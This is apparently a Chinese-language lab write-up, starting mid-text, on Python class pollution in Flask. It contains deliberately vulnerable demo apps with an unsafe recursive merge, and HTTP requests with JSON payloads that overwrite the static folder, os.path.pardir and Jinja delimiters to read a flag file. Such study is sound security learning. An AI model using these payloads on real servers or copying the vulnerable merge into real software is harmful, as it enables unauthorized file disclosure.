sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Type: application/json
Content-Length: 145
{
"__init__":{
"__globals__":{
"app":{
"_got_first_request":false
}
}
}
}
这里还有一个点,就是因为版本问题false必须写成这样子,而不是False
_static_url_path 这个属性用于定义静态文件的目录,默认情况下,Flask 会从 static 文件夹中提供静态文件。所以我们只要污染这个属性就可以进行目录穿越
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
class Flask ( WerkzeugApp ):
def __init__ ( self , import_name , static_url_path = None , static_folder = 'static' ,
static_host = None , host_matching = False , subdomain_matching = False ,
template_folder = 'templates' , instance_path = None ,
instance_relative_config = False , root_path = None ):
# ... 其他初始化代码 ...
if static_url_path is not None :
self . _static_url_path = static_url_path
else :
self . _static_url_path = '/static'
if static_folder is not None :
self . static_folder = static_folder
else :
self . static_folder = 'static'
# ... 其他初始化代码 ...
查了一下,_static_folder控制了实际静态文件所在位置,我们自己起环境试试
1
2
3
4
5
< html >
< h1 > hello</ h1 >
< body >
</ body >
</ html >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from flask import Flask , request
import json
app = Flask ( __name__ )
def merge ( src , dst ):
# Recursive merge function
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
class cls ():
def __init__ ( self ):
pass
instance = cls ()
@app.route ( '/' , methods = [ 'POST' , 'GET' ])
def index ():
if request . data :
merge ( json . loads ( request . data ), instance )
return "flag in ./flag but heres only static/index.html"
app . run ( host = "0.0.0.0" )
还得是服务器啊,本地老是出问题,不知道为啥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST / HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 142
{
"__init__":{
"__globals__":{
"app":{
"_static_folder":"./"
}
}
}
}
然后污染成功就可以啦
1
2
3
4
5
6
7
8
9
10
GET /static/flag HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
注意搭建环境的时候目录是这样的
os.path.pardir 这里test时把static文件夹改成templates
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from flask import Flask , request , render_template
import json
import os
app = Flask ( __name__ )
def merge ( src , dst ):
# Recursive merge function
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
class cls ():
def __init__ ( self ):
pass
instance = cls ()
@app.route ( '/' , methods = [ 'POST' , 'GET' ])
def index ():
if request . data :
merge ( json . loads ( request . data ), instance )
return "flag in ./flag but u just can use /file to vist ./templates/file"
@app.route ( "/<path:path>" )
def render_page ( path ):
if not os . path . exists ( "templates/" + path ):
return "not found" , 404
return render_template ( path )
app . run ( host = "0.0.0.0" , port = 5000 , debug = True )
这里很明显我们要目录穿越,但是它只让我们查看/templates里面的文件,那怎么办呢,先穿越,打出报错(但是像之前进行pin码计算一样,我也不能稳定的打出报错),访问/test.py打出报错,由于我们这里是因为渲染的报错,所以我们跟进这个
使用Ctrl+鼠标左键跟进来之后发现
继续跟进,注意我们这里是因为path的原因导致的渲染失败,所以我们进来找path
这个函数把我们的路径进行拆分,估计是这里有问题,还有就是我标的那个符号,引用Infernity 师傅的话
这个符号名为重写符号,对父类进行重写,我们跟进的时候只需要看自己需要哪个,就找哪个
所以这里我们是路径问题,找到了第二个get_source函数,继续跟进
欧克啊终于是找到了,那么污染
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST / HTTP / 1.1
Host : ip : 5000
Cache - Control : max - age = 0
Upgrade - Insecure - Requests : 1
User - Agent : Mozilla / 5.0 ( Windows NT 10.0 ; Win64 ; x64 ) AppleWebKit / 537.36 ( KHTML , like Gecko ) Chrome / 129.0.0.0 Safari / 537.36
Accept : text / html , application / xhtml + xml , application / xml ; q = 0.9 , image / avif , image / webp , image / apng , */* ; q = 0.8 , application / signed - exchange ; v = b3 ; q = 0.7
Accept - Encoding : gzip , deflate
Accept - Language : zh - CN , zh ; q = 0.9 , en ; q = 0.8
Cookie : psession = 65 b25e9d - b6c8 - 4 b71 - bb63 - 9417e0 d14c45
Connection : close
Content - Type : application / json
Content - Length : 179
{
"__init__" :{
"__globals__" :{
"os" :{
"path" :{
"pardir" : "?"
}
}
}
}
}
1
2
3
4
5
6
7
8
9
10
GET /../flag HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
jinja_SSTI 大家常见的是{{}},但是有些特殊情况有这个是,那么我们就可以污染一下,使得其他符号也能做到相同的效果
1
2
3
4
5
< html >
< h1 > Look this -> [[flag]] < - try to make it become the real flag </ h1 >
< body >
</ body >
</ html >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from flask import Flask , request , render_template
import json
app = Flask ( __name__ )
def merge ( src , dst ):
# Recursive merge function
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
class cls ():
def __init__ ( self ):
pass
instance = cls ()
@app.route ( '/' , methods = [ 'POST' , 'GET' ])
def index ():
if request . data :
merge ( json . loads ( request . data ), instance )
return "go check /index before merge it"
@app.route ( '/index' , methods = [ 'POST' , 'GET' ])
def templates ():
return render_template ( "index.html" , flag = open ( "flag" , "rt" ) . read ())
app . run ( host = "0.0.0.0" , port = 5000 , debug = True )
这边尝试了一会儿,都拿不到报错消息,那我们本是是不是jinja的问题,那我们直接进flask,这里的目的就是污染jinja标识符为[[]],那样子我们就可以拿到flag了,找不到跟进哪里了,那看看官方文档https://jinja.palletsprojects.com/en/3.1.x/api/#jinja2.Environment
然后还是找不到,不过我们知道了一些重要消息,variable_start_string,variable_end_string,直接问AI知道是这里
好了,这里我们直接跟进,发现啥玩意,找不到任何东西
很显然么有任何用,但是看了看也才200多行,可以直接浏览一下,发现有很多类似于这种东西app.jinja_env.from_string,那我们此时直接替换成我们的不就可以了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST / HTTP / 1.1
Host : ip : 5000
Pragma : no - cache
Cache - Control : no - cache
Upgrade - Insecure - Requests : 1
User - Agent : Mozilla / 5.0 ( Windows NT 10.0 ; Win64 ; x64 ) AppleWebKit / 537.36 ( KHTML , like Gecko ) Chrome / 129.0 . 0.0 Safari / 537.36
Accept : text / html , application / xhtml + xml , application / xml ; q = 0.9 , image / avif , image / webp , image / apng , */* ; q = 0.8 , application / signed - exchange ; v = b3 ; q = 0.7
Accept - Encoding : gzip , deflate
Accept - Language : zh - CN , zh ; q = 0.9 , en ; q = 0.8
Cookie : psession = 65 b25e9d - b6c8 - 4 b71 - bb63 - 9417e0 d14c45
Connection : close
Content - Type : application / json
Content - Length : 250
{
"__init__" :{
"__globals__" :{
"app" :{
"jinja_env" :{
"variable_start_string" : "[[" ,
"variable_end_string" : "]]"
}
}
}
}
}
再访问index就拿到flag了,但是这里仍然有个小细节,就是如果直接跟着提示进入了/index,那么再次进行污染是不会被解析的
Flask默认会对一定数量内的模板文件编译渲染后进行缓存,下次访问时若有缓存则会优先渲染缓存,所以输入payload污染之后虽然语法标识符被替换了,但渲染的内容还是按照污染前语生成的缓存,由于缓存编译时并没有存在flag变量,所以自然没有被填充flag。
所以我们要先污染,再进行访问
padash 这个模块里面的函数和merge基本相同,同样可以做到污染的事情,后面再研究
0x03 小结 太优雅了,而且在这个过程中学会了跟进代码去审计,知道原理逻辑,虽然确实中间调试的时候会花费很多时间但是很开心!不过这里所提及的东西还是太过浅显,包括劫持等操作,后面还会探讨
0x04 reference Infernity 师傅对于代码审计部分的一些基本操作的帮助(第一次跟进,感觉很舒服)
期间还问了一些师傅其他问题,最后自己慢慢调试解决问题,谢谢师傅们的帮助啦
网上的文章都有看,谢谢师傅们!